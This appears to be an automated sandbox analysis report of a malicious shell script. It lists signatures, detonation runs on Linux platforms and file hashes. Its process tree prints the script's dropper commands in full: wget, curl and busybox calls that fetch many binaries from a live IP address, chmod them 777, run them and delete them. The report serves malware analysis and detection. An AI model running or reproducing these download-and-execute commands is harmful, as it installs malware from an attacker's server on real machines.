Analysis Overview
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
Threat Level: Shows suspicious behavior
The file 56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:34
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
debian9-mipsel-20240611-en
Max time kernel
78s
Max time network
80s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
18s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
